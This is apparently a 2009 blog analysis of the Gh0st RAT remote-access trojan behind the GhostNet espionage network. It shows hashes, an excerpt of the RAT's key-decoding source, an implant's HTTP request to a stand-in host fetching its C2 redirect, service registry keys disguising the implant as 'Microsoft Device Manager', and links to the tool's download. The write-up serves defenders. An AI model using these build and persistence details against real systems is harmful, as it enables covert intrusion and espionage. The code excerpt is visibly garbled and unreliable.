Saturday, April 11, 2009

Gh0st Rat

On April 11, 2009, researchers at the Information Warfare Monitor released a report that uncovered a suspected cyber espionage network of over 1,295 infected hosts in 103 countries. The report "Tracking GhostNet: Investigating a Cyber Espionage Network" is summarized as:

"This report documents the GhostNet - a suspected cyber espionage network of over 1,295 infected computers in 103 countries, 30% of which are high-value targets, including ministries of foreign affairs, embassies, international organizations, news media, and NGOs.

The capabilities of GhostNet are far-reaching. The report reveals that Tibetan computer systems were compromised giving attackers access to potentially sensitive information, including documents from the private office of the Dalai Lama. The report presents evidence showing that numerous computer systems were compromised in ways that circumstantially point to China as the culprit. But the report is careful not to draw conclusions about the exact motivation or the identity of the attacker(s), or how to accurately characterize this network of infections as a whole. The report argues that attribution can be obscured.

The report concludes that who is in control of GhostNet is less important than the opportunity for generating strategic intelligence that it represents. The report underscores the growing capabilities of computer network exploitation, the ease by which cyberspace can be used as a vector for new do-it-yourself form of signals intelligence. It ends with warning to policy makers that information security requires serious attention."

Gh0st RAT
GhostNet is a dubbed name for the C2 network of hosts infected with Gh0st RAT. The latest version of Gh0st RAT is Gh0st RAT Beta 3.6.

Gh0st RAT Beta 3.6 (English) Usage

Server Creation
The file gh0st_eng.exe is used to create the Gh0st RAT server dropper and serves as the C2 management console.

File: gh0st_eng.exe
Size: 712704
MD5: 88912D9FE630BEE510BD7E85D0F9331D



The setting tab provides the C2 listening port, proxy configurations, user and password, IP and port for the Gh0st RAT to connect to, and a string created by an algorithm based on the DNS/IP and port.



The Gh0st RAT Beta 3.6 source decode.h file contains the algorithm for the Key Strings creation.

static char base64[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

static int pos(char c)
{
char *p;
for(p = base64; *p; p++)
if(*p == c)
return p - base64;
return -1;
}

int base64_decode(const char *str, char **data)
{
const char *s, *p;
unsigned char *q;
int c;
int x;
int done = 0;
int len;
s = (const char *)malloc(strlen(str));
q = (unsigned char *)s;
for(p=str; *p && !done; p+=4){
x = pos(p[0]);
if(x >= 0)
c = x;
else{
done = 3;
break;
}
c*=64;

x = pos(p[1]);
if(x >= 0)
c += x;
else
return -1;
c*=64;

if(p[2] == '=')
done++;
else{
x = pos(p[2]);
if(x >= 0)
c += x;
else
return -1;
}
c*=64;

if(p[3] == '=')
done++;
else{
if(done)
return -1;
x = pos(p[3]);
if(x >= 0)
c += x;
else
return -1;
}
if(done <>>16;

if(done <>>8;
if(done <>>0;
}

len = q - (unsigned char*)(s);

*data = (char*)realloc((void *)s, len);

return len;
}

char* MyDecode(char *str)
{
int i, len;
char *data = NULL;
len = base64_decode(str, &data);

for (i = 0; i <>

The build tab provides a C2 HTTP initial destination, and registry key parameters. The tool gives credit to C.Rufus Security Team and CoolDiyer. The source code ReadMe file included the following credits and links to the tool and demo.

Gh0st RAT
C.Rufus Security Team
http://www.wolfexp.net

http://www.wolfexp.net/other/Gh0st_RAT/index.html
http://www.wolfexp.net/other/Gh0st_RAT/demo.rar

In this example, the Gh0st RAT server was created as:

File: server.exe
Size: 112247
MD5: 7602AA86A58D68CCFD2E380BD6DA5158



Server Execution
The server component is intended to be executed on a victim system. The execution of server.exe results in the download of ip.jpg which contains the string that causes the redirect to the real C2 site.

GET /ip.jpg HTTP/1.0
User-Agent: Mozilla/4.0 (compatible)
Host: www.badsite.org

Pragma: no-cache


HTTP/1.1 200 OK

Date: Sat, 11 Apr 2009 18:13:58 GMT

Server: Apache

Last-Modified: Sat, 11 Apr 2009 18:06:35 GMT

ETag: "1bdecfd-20-49e0dc2b"

Accept-Ranges: bytes

Content-Length: 32

Connection: close

Content-Type: image/jpeg


AAAArqaxva61p72vva6xqaevnw==AAAA



Server.exe creates the dll file 6to4svc.dll in the system32 directory.

File: 6to4svc.dll
Size: 100352
MD5: 97D0CECEF133BBE59ABF3CB6D05226C3

The following registry keys register 6to4svc.dll as the service 6to4 with the display name Microsoft Device Manager.

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Description"
Type: REG_SZ
Data: Service Description
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "DisplayName"
Type: REG_SZ
Data: Microsoft Device Manager
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ErrorControl"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ImagePath"
Type: REG_EXPAND_SZ
Data: %SystemRoot%\System32\svchost.exe -k netsvcs
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "ObjectName"
Type: REG_SZ
Data: LocalSystem
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Start"
Type: REG_DWORD
Data: 02, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4 "Type"
Type: REG_DWORD
Data: 20, 01, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "0"
Type: REG_SZ
Data: Root\LEGACY_6TO4\0000
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "Count"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Enum "NextInstance"
Type: REG_DWORD
Data: 01, 00, 00, 00
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Parameters "ServiceDll"
Type: REG_EXPAND_SZ
Data: C:\WINDOWS\system32\6to4ex.dll
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\6to4\Security "Security"
Type: REG_BINARY
Data:[hex]


The Gh0st RAT server 6to4svc.dll connects to the C2 host destination.



Server Gh0st RAT Management
The Gh0st RAT C2 management console provides several options for manipulating a victim host. The C2 functionality can be observed at http://www.youtube.com/watch?v=qP-9qmSCe7o